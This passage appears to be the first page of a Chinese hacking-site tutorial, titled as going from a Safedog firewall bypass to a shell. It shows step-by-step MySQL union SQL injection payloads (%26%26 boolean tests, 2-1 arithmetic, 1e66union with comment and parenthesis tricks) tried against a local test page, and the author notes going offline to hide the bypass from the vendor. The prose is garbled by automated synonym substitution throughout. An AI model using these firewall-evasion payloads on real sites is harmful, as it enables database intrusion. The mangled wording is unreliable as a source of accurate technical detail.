MySQL联合注入之绕过安全狗到GetShell

访客5年前黑客文章992

发现网上公开过安全狗的办法少之又少,并且根本都是给个大约点就完毕,本文章是将整个进程记录了一遍,因为一开始我也没想到我能成功的绕过去,大约进程是这样:Mysql根底有必要要有–>定位—>fuzz—>得出剖析成果–>手艺测验—>成功绕过。
网站安全狗:
面向网站安全,包含:网马扫描及查杀(自有引擎,只针对网页木马);网马自动防护功用(可自动阻拦网马 上传和拜访的动作);防SQL注入功用、防XSS跨站进犯 功用;防盗链防下载;以及避免CC进犯。 
相关代码:

测验进程
为了得到更好的测验,我写了21行的缝隙代码,用来模仿进犯,并且在本机搭建了安全狗,挑选了4.0最新版别,在测验的进程中,碰到了各式各样的阻挠,最终成功绕过了安全狗,以下是悉数进程(边写文章边绕)。
恳求 :http://127.0.0.1/1.php?id=1 and 1=1

判别是否存在SQL注入:
咱们改成http://127.0.0.1/1.php?id=1and asd #没有被拦
http://127.0.0.1/1.php?id=1 axnxd 1=1 #没有被拦
得出结论 是正则匹配
只要把asd变型 或许 把axnxd 变型即可
http://127.0.0.1/1.php?id=1 %26%26 true #真
http://127.0.0.1/1.php?id=1 %26%26 false #假
http://127.0.0.1/1.php?id=1 %26%26 1 #真
http://127.0.0.1/1.php?id=1 %26%26 0 #假

加上两点:
假如判别SQL注入并且是Int类型注入:
http://127.0.0.1/1.php?id=2-1
因为这个INT注入类型没有进行转义成INT类型
所以就能够操作加减乘除法
http://127.0.0.1/1.php?id=2-1   实际上就成了http://127.0.0.1/1.php?id=1#2减1等于1
这样成功绕过了判别是否存在SQL注入
判别字段:
Order by xx #竟然没有被拦

安全狗是昨日(2019年5月16)下载的 因为我怕自己的日志被上传到日志服务器安全人员会进行剖析 然后得出绕过安全狗的SQL句子,所以我就断网了。

进行联合注入:

变型之前首要知道要改哪个方位
http://127.0.0.1/1.php?id=1xunion(select1,2)

把注意力转换到X这个字节上。咱们能够进行fuzz。可是我个人仍是喜爱手艺一个一个挨个的试、
这儿结合了一篇老外的文章:https://medium.com/bugbountywriteup/sql-injection-in-ctf-bef1ae0c5d9b
原理便是使用INT溢出进行绕过空格



仍是被阻拦
持续变型
找出要害所在方位
http://127.0.0.1/1.php?id=1e66union(1select1,2)

要害方位在1.这个方位需求变型
http://127.0.0.1/1.php?id=1e66union((select1,2))
http://127.0.0.1/1.php?id=1e66union(/**/select1,2)
http://127.0.0.1/1.php?id=1e66union(/**/select1,2)

[1] [2] [3]  黑客接单网

相关文章

TrickBot银行木马归来突击全球金融机构

一、布景 最近国外安全研究人员发现TrickBot银行木马最新的样本,深服气EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细剖析,承认此样本为TrickBot银行盗号木马的最...

Ostap:超过34,000行的JavaScript下载器用于TrickBot分发活动中-黑客接单平台

要挟行为者在损害体系时,一般需求考虑怎么进入方针网络才干防止被检测到,而传递歹意附件的网络垂钓邮件往往就充当了初始感染前言的人物。 此外,攻击者还需求一种办法,在安全监控产品的眼皮底下履行代码。最常见...

怎样使用追寻代码来发现网站之间的“相关”

前些年Lawrence Alexander颁发了一篇使用Google Analytics查找网页之间的联络联络的文章,客岁,我也宣告了一个关于若何使用Python自动开掘信息,然后将其可视化的帖子,不...

安全研究人员发现 Hacking Team 新开发不易发觉的Mac歹意软件

研究者在HackingTeam上发现了新开发的Mac歹意软件,这项发现促进了投机活动。自从上一年七月以来,这款臭名远扬的歹意软件造成了数Gbytes集团私家邮件和源代码的流出,现在这款软件作者再次出...

HTML5 安全问题解析

HTML5 安全问题解析 标签: html html5 web安全 本文参阅: w3school:html5相关基础知识(w3school.com.cn)...

一份来源未知的数据,揭秘了OilRig组织的全部信息(下)-黑客接单平台

Webshells Webshell用于与受感染服务器交互。走漏数据中包含了三个webshell,分别为HyperShell、HighShell和Minion,Minion很可能是HighShell的...